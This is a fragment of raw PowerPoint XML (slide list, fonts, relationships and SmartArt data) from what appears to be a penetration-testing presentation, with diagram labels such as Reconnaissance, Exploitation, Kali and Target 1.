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63" r:id="rId5"/>
    <p:sldId id="264" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="267" r:id="rId8"/>
    <p:sldId id="268" r:id="rId9"/>
    <p:sldId id="307" r:id="rId10"/>
    <p:sldId id="259" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="272" r:id="rId14"/>
    <p:sldId id="271" r:id="rId15"/>
    <p:sldId id="270" r:id="rId16"/>
    <p:sldId id="269" r:id="rId17"/>
    <p:sldId id="260" r:id="rId18"/>
    <p:sldId id="308" r:id="rId19"/>
    <p:sldId id="309" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="278" r:id="rId22"/>
    <p:sldId id="279" r:id="rId23"/>
    <p:sldId id="280" r:id="rId24"/>
    <p:sldId id="276" r:id="rId25"/>
    <p:sldId id="262" r:id="rId26"/>
    <p:sldId id="277" r:id="rId27"/>
    <p:sldId id="295" r:id="rId28"/>
    <p:sldId id="282" r:id="rId29"/>
    <p:sldId id="285" r:id="rId30"/>
    <p:sldId id="286" r:id="rId31"/>
    <p:sldId id="289" r:id="rId32"/>
    <p:sldId id="288" r:id="rId33"/>
    <p:sldId id="287" r:id="rId34"/>
    <p:sldId id="291" r:id="rId35"/>
    <p:sldId id="292" r:id="rId36"/>
    <p:sldId id="294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5" r:id="rId46"/>
    <p:sldId id="306" r:id="rId47"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId49"/>
      <p:bold r:id="rId50"/>
      <p:italic r:id="rId51"/>
      <p:boldItalic r:id="rId52"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
      <p:regular r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId54"/>
      <p:bold r:id="rId55"/>
      <p:italic r:id="rId56"/>
      <p:boldItalic r:id="rId57"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId58"/>
      <p:bold r:id="rId59"/>
      <p:italic r:id="rId60"/>
      <p:boldItalic r:id="rId61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9E"/>
    <a:srgbClr val="4F81BD"/>
    <a:srgbClr val="95B3D7"/>
    <a:srgbClr val="99CCFF"/>
    <a:srgbClr val="1B368F"/>
    <a:srgbClr val="00007E"/>
    <a:srgbClr val="EDDA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333" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="112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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1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font" Target="fonts/font12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60A2A9-BEC9-4D30-B9B0-8D3929A8AD33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F0DEA84D-AA8B-4F93-8399-A8CC75566F45}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B406E117-A363-4D62-BBB3-FC7F5F86E625}" type="parTrans" cxnId="{F7A38BCA-59EC-4936-A652-706AFD328484}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06B637BD-D992-4902-BC5D-AE811C700D1F}" type="sibTrans" cxnId="{F7A38BCA-59EC-4936-A652-706AFD328484}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A2C5FE9-A3E6-409E-ACBA-2D5739311617}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Discovery</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A138F12-1C3D-458B-B138-147E6520414D}" type="parTrans" cxnId="{242A7E5D-F9DE-4744-8A8E-AEE887A11EAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{330A6AA1-4174-49F9-9B91-58C5A8368980}" type="sibTrans" cxnId="{242A7E5D-F9DE-4744-8A8E-AEE887A11EAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F37376A4-D6BB-4973-813C-41F8E41DE098}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Post-Exploitation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1A8027E-E227-4C9A-9056-93756727F0D8}" type="parTrans" cxnId="{722C6A28-CC7C-44C2-BC42-85BE20AA24A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94531007-55CA-4F68-AFCF-2075B59370A1}" type="sibTrans" cxnId="{722C6A28-CC7C-44C2-BC42-85BE20AA24A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{488A0729-117F-49F6-98DC-3730129128CA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Exploitation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4D15713-C7E8-4A0F-992B-BE4A0EE3BC6D}" type="parTrans" cxnId="{190359D2-5246-40F7-91EB-82A5C550F842}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52ACF77E-03D7-46B9-BD52-9DE3605FB5B0}" type="sibTrans" cxnId="{190359D2-5246-40F7-91EB-82A5C550F842}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84200BCF-FE77-4D6D-910D-C1934DA67E44}" type="pres">
      <dgm:prSet presAssocID="{1260A2A9-BEC9-4D30-B9B0-8D3929A8AD33}" presName="CompostProcess" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4461E507-5110-4F36-AAE3-549653AD876C}" type="pres">
      <dgm:prSet presAssocID="{1260A2A9-BEC9-4D30-B9B0-8D3929A8AD33}" presName="arrow" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{03CABA8D-7E5A-46A7-BC30-7D640DCCB663}" type="pres">
      <dgm:prSet presAssocID="{1260A2A9-BEC9-4D30-B9B0-8D3929A8AD33}" presName="linearProcess" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A6BAE26-66E2-433B-AEAF-978CB3B8215F}" type="pres">
      <dgm:prSet presAssocID="{F0DEA84D-AA8B-4F93-8399-A8CC75566F45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C3A5B5-E0DA-42DB-BDC6-BD105B48359F}" type="pres">
      <dgm:prSet presAssocID="{06B637BD-D992-4902-BC5D-AE811C700D1F}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{565CC2F1-C54C-49A7-8D31-D8C2406AA2E1}" type="pres">
      <dgm:prSet presAssocID="{6A2C5FE9-A3E6-409E-ACBA-2D5739311617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1CAE68-5909-4772-B167-9BA3E5925D12}" type="pres">
      <dgm:prSet presAssocID="{330A6AA1-4174-49F9-9B91-58C5A8368980}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A089CE17-5A6E-4662-8F0C-11F0327D911E}" type="pres">
      <dgm:prSet presAssocID="{488A0729-117F-49F6-98DC-3730129128CA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6ECC3C-EA96-4655-AB65-E15DED1289AD}" type="pres">
      <dgm:prSet presAssocID="{52ACF77E-03D7-46B9-BD52-9DE3605FB5B0}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{72E67A71-9089-49D8-9366-127099EA515D}" type="pres">
      <dgm:prSet presAssocID="{F37376A4-D6BB-4973-813C-41F8E41DE098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C6978C0-99B6-480F-B777-54A812F2836C}" type="presOf" srcId="{6A2C5FE9-A3E6-409E-ACBA-2D5739311617}" destId="{565CC2F1-C54C-49A7-8D31-D8C2406AA2E1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{6A89391B-A94C-4168-9036-D74EA5CB8608}" type="presOf" srcId="{1260A2A9-BEC9-4D30-B9B0-8D3929A8AD33}" destId="{84200BCF-FE77-4D6D-910D-C1934DA67E44}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{A75606EF-D905-49DE-8595-8447C2B9E51F}" type="presOf" srcId="{488A0729-117F-49F6-98DC-3730129128CA}" destId="{A089CE17-5A6E-4662-8F0C-11F0327D911E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{242A7E5D-F9DE-4744-8A8E-AEE887A11EAC}" srcId="{1260A2A9-BEC9-4D30-B9B0-8D3929A8AD33}" destId="{6A2C5FE9-A3E6-409E-ACBA-2D5739311617}" srcOrd="1" destOrd="0" parTransId="{6A138F12-1C3D-458B-B138-147E6520414D}" sibTransId="{330A6AA1-4174-49F9-9B91-58C5A8368980}"/>
    <dgm:cxn modelId="{722C6A28-CC7C-44C2-BC42-85BE20AA24A6}" srcId="{1260A2A9-BEC9-4D30-B9B0-8D3929A8AD33}" destId="{F37376A4-D6BB-4973-813C-41F8E41DE098}" srcOrd="3" destOrd="0" parTransId="{C1A8027E-E227-4C9A-9056-93756727F0D8}" sibTransId="{94531007-55CA-4F68-AFCF-2075B59370A1}"/>
    <dgm:cxn modelId="{CED4A12F-FC81-4720-93A2-F7BD3168D119}" type="presOf" srcId="{F0DEA84D-AA8B-4F93-8399-A8CC75566F45}" destId="{1A6BAE26-66E2-433B-AEAF-978CB3B8215F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{190359D2-5246-40F7-91EB-82A5C550F842}" srcId="{1260A2A9-BEC9-4D30-B9B0-8D3929A8AD33}" destId="{488A0729-117F-49F6-98DC-3730129128CA}" srcOrd="2" destOrd="0" parTransId="{C4D15713-C7E8-4A0F-992B-BE4A0EE3BC6D}" sibTransId="{52ACF77E-03D7-46B9-BD52-9DE3605FB5B0}"/>
    <dgm:cxn modelId="{43C8DC3C-9DEB-4C6B-8049-3DB6B6D12710}" type="presOf" srcId="{F37376A4-D6BB-4973-813C-41F8E41DE098}" destId="{72E67A71-9089-49D8-9366-127099EA515D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{F7A38BCA-59EC-4936-A652-706AFD328484}" srcId="{1260A2A9-BEC9-4D30-B9B0-8D3929A8AD33}" destId="{F0DEA84D-AA8B-4F93-8399-A8CC75566F45}" srcOrd="0" destOrd="0" parTransId="{B406E117-A363-4D62-BBB3-FC7F5F86E625}" sibTransId="{06B637BD-D992-4902-BC5D-AE811C700D1F}"/>
    <dgm:cxn modelId="{5FB3CFE7-54D7-4ED0-A4A9-AFAA4E5FD3D4}" type="presParOf" srcId="{84200BCF-FE77-4D6D-910D-C1934DA67E44}" destId="{4461E507-5110-4F36-AAE3-549653AD876C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{66911BE2-9B35-4A3A-87C1-15B69D2DC30D}" type="presParOf" srcId="{84200BCF-FE77-4D6D-910D-C1934DA67E44}" destId="{03CABA8D-7E5A-46A7-BC30-7D640DCCB663}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{A46972F3-51F7-49D3-9E2B-4A1BF4D19E48}" type="presParOf" srcId="{03CABA8D-7E5A-46A7-BC30-7D640DCCB663}" destId="{1A6BAE26-66E2-433B-AEAF-978CB3B8215F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{C7B9E249-F634-4A86-8D63-F097B7F89FC0}" type="presParOf" srcId="{03CABA8D-7E5A-46A7-BC30-7D640DCCB663}" destId="{77C3A5B5-E0DA-42DB-BDC6-BD105B48359F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{37449BE9-8588-46D9-91D9-ED6B5744CA04}" type="presParOf" srcId="{03CABA8D-7E5A-46A7-BC30-7D640DCCB663}" destId="{565CC2F1-C54C-49A7-8D31-D8C2406AA2E1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{A4CBCC6E-DE32-4500-9AC3-7ABA5F060AC3}" type="presParOf" srcId="{03CABA8D-7E5A-46A7-BC30-7D640DCCB663}" destId="{461CAE68-5909-4772-B167-9BA3E5925D12}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{4AC90BCB-BBF8-42B8-984B-631240FF1007}" type="presParOf" srcId="{03CABA8D-7E5A-46A7-BC30-7D640DCCB663}" destId="{A089CE17-5A6E-4662-8F0C-11F0327D911E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{CCB5515B-2401-4D07-867E-5DB71849C489}" type="presParOf" srcId="{03CABA8D-7E5A-46A7-BC30-7D640DCCB663}" destId="{246ECC3C-EA96-4655-AB65-E15DED1289AD}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{D313508C-DF7B-490A-8F2E-FBF8010E2E90}" type="presParOf" srcId="{03CABA8D-7E5A-46A7-BC30-7D640DCCB663}" destId="{72E67A71-9089-49D8-9366-127099EA515D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E5132A-AC39-479B-B3C9-150F12CF4AC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48B081-865F-4479-8A9A-4EA10CC74061}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Kali</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCA6E6A2-7793-4E92-8BF9-39530831A2AB}" type="parTrans" cxnId="{082583D4-7A18-447C-BE6E-C0053EED6870}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8BA38297-24AB-41A2-A07E-8F4171D8E19C}" type="sibTrans" cxnId="{082583D4-7A18-447C-BE6E-C0053EED6870}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6476FF3-4C8E-4CC3-BD48-49BF5F0FB48E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Target 1</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13C586D7-072A-42F1-A5F3-C9397AD9DC01}" type="parTrans" cxnId="{41BD6A27-A15E-4210-8552-E59CC48A9FFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4CF74128-718F-4947-8CEF-CA151926F609}" type="sibTrans" cxnId="{41BD6A27-A15E-4210-8552-E59CC48A9FFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BACF0C6F-D906-46C4-990F-9F2ED2443781}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Target 2</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A98A466-C772-4363-AC5D-A54B686830D1}" type="parTrans" cxnId="{BD33E8D5-3BC9-4891-B066-D22AA89DC089}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68EE5EE8-05B9-4EC9-92D7-8F0B15FF9DDA}" type="sibTrans" cxnId="{BD33E8D5-3BC9-4891-B066-D22AA89DC089}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{734E576C-5205-4632-9522-1C4A10231144}" type="pres">
      <dgm:prSet presAssocID="{49E5132A-AC39-479B-B3C9-150F12CF4AC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3723616-C322-4172-B4AE-1A7FC0E3F15D}" type="pres">
      <dgm:prSet presAssocID="{F448B081-865F-4479-8A9A-4EA10CC74061}" presName="hierRoot1" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:hierBranch val="init"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4B55915-DFFC-4572-BB3F-C4E42BB4E24C}" type="pres">
      <dgm:prSet presAssocID="{F448B081-865F-4479-8A9A-4EA10CC74061}" presName="rootComposite1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5442B93-493C-409E-9FA2-3727E306FBF6}" type="pres">
      <dgm:prSet presAssocID="{F448B081-865F-4479-8A9A-4EA10CC74061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610C459-2B34-408A-9D57-717E43E49071}" type="pres">
      <dgm:prSet presAssocID="{F448B081-865F-4479-8A9A-4EA10CC74061}" presName="rootConnector1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD5C458B-59FE-480A-9886-60CAAFFDC42E}" type="pres">
      <dgm:prSet presAssocID="{F448B081-865F-4479-8A9A-4EA10CC74061}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2665F58F-28C5-4321-8650-E8EDEF9CD62A}" type="pres">
      <dgm:prSet presAssocID="{13C586D7-072A-42F1-A5F3-C9397AD9DC01}" presName="Name37" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4757894C-81FB-4482-B7B8-C7E2FE063768}" type="pres">
      <dgm:prSet presAssocID="{B6476FF3-4C8E-4CC3-BD48-49BF5F0FB48E}" presName="hierRoot2" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:hierBranch val="init"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{97AC6E11-33D2-42C2-8149-E76310900422}" type="pres">
      <dgm:prSet presAssocID="{B6476FF3-4C8E-4CC3-BD48-49BF5F0FB48E}" presName="rootComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4C1ECC2F-B2CC-488A-A754-64DC51CF9CE4}" type="pres">
      <dgm:prSet presAssocID="{B6476FF3-4C8E-4CC3-BD48-49BF5F0FB48E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E1FBD9C-319B-45FC-A33A-7F889177AB5C}" type="pres">
      <dgm:prSet presAssocID="{B6476FF3-4C8E-4CC3-BD48-49BF5F0FB48E}" presName="rootConnector" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{616D6038-104B-4AD2-9196-DC33CDFCCAED}" type="pres">
      <dgm:prSet presAssocID="{B6476FF3-4C8E-4CC3-BD48-49BF5F0FB48E}" presName="hierChild4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0DB7E55A-B0FF-4B81-B337-2DF23D1A0447}" type="pres">
      <dgm:prSet presAssocID="{B6476FF3-4C8E-4CC3-BD48-49BF5F0FB48E}" presName="hierChild5" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9556810F-4357-4B77-A7B5-AECD2BB47580}" type="pres">
      <dgm:prSet presAssocID="{5A98A466-C772-4363-AC5D-A54B686830D1}" presName="Name37" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E41D6A1-C600-4FFE-B57C-538657AC9F4A}" type="pres">
      <dgm:prSet presAssocID="{BACF0C6F-D906-46C4-990F-9F2ED2443781}" presName="hierRoot2" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:hierBranch val="init"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25817C01-795D-4A9E-B01C-AEC4265CB180}" type="pres">
      <dgm:prSet presAssocID="{BACF0C6F-D906-46C4-990F-9F2ED2443781}" presName="rootComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5A29BBF1-09D5-4F82-9BDA-02FC488BDB11}" type="pres">
      <dgm:prSet presAssocID="{BACF0C6F-D906-46C4-990F-9F2ED2443781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9AC502E-29C9-4E34-ACCA-118CD9CB49E3}" type="pres">
      <dgm:prSet presAssocID="{BACF0C6F-D906-46C4-990F-9F2ED2443781}" presName="rootConnector" presStyleLbl="node2" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BAEF2CA-0434-45B8-B3BF-9F1C3557CBB8}" type="pres">
      <dgm:prSet presAssocID="{BACF0C6F-D906-46C4-990F-9F2ED2443781}" presName="hierChild4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0C58D920-44C4-451B-90D6-62797E1110EC}" type="pres">
      <dgm:prSet presAssocID="{BACF0C6F-D906-46C4-990F-9F2ED2443781}" presName="hierChild5" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3AA723FB-39B1-41EF-88C0-82459B8FE255}" type="pres">
      <dgm:prSet presAssocID="{F448B081-865F-4479-8A9A-4EA10CC74061}" presName="hierChild3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{17CE8470-37FA-4439-9181-37C0E7117B13}" type="presOf" srcId="{F448B081-865F-4479-8A9A-4EA10CC74061}" destId="{D5442B93-493C-409E-9FA2-3727E306FBF6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{497AF971-0997-4B84-B210-BACB110C570A}" type="presOf" srcId="{BACF0C6F-D906-46C4-990F-9F2ED2443781}" destId="{5A29BBF1-09D5-4F82-9BDA-02FC488BDB11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{E2674BA4-E97B-4259-91B1-A89503A54B05}" type="presOf" srcId="{B6476FF3-4C8E-4CC3-BD48-49BF5F0FB48E}" destId="{4C1ECC2F-B2CC-488A-A754-64DC51CF9CE4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{900904CA-3EA9-45BA-A7DE-78AC908B9E87}" type="presOf" srcId="{F448B081-865F-4479-8A9A-4EA10CC74061}" destId="{8610C459-2B34-408A-9D57-717E43E49071}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{6A1146DB-A4F9-4951-A8AA-6B556BE13E2B}" type="presOf" srcId="{B6476FF3-4C8E-4CC3-BD48-49BF5F0FB48E}" destId="{5E1FBD9C-319B-45FC-A33A-7F889177AB5C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{082583D4-7A18-447C-BE6E-C0053EED6870}" srcId="{49E5132A-AC39-479B-B3C9-150F12CF4ACB}" destId="{F448B081-865F-4479-8A9A-4EA10CC74061}" srcOrd="0" destOrd="0" parTransId="{DCA6E6A2-7793-4E92-8BF9-39530831A2AB}" sibTransId="{8BA38297-24AB-41A2-A07E-8F4171D8E19C}"/>
    <dgm:cxn modelId="{41BD6A27-A15E-4210-8552-E59CC48A9FFC}" srcId="{F448B081-865F-4479-8A9A-4EA10CC74061}" destId="{B6476FF3-4C8E-4CC3-BD48-49BF5F0FB48E}" srcOrd="0" destOrd="0" parTransId="{13C586D7-072A-42F1-A5F3-C9397AD9DC01}" sibTransId="{4CF74128-718F-4947-8CEF-CA151926F609}"/>
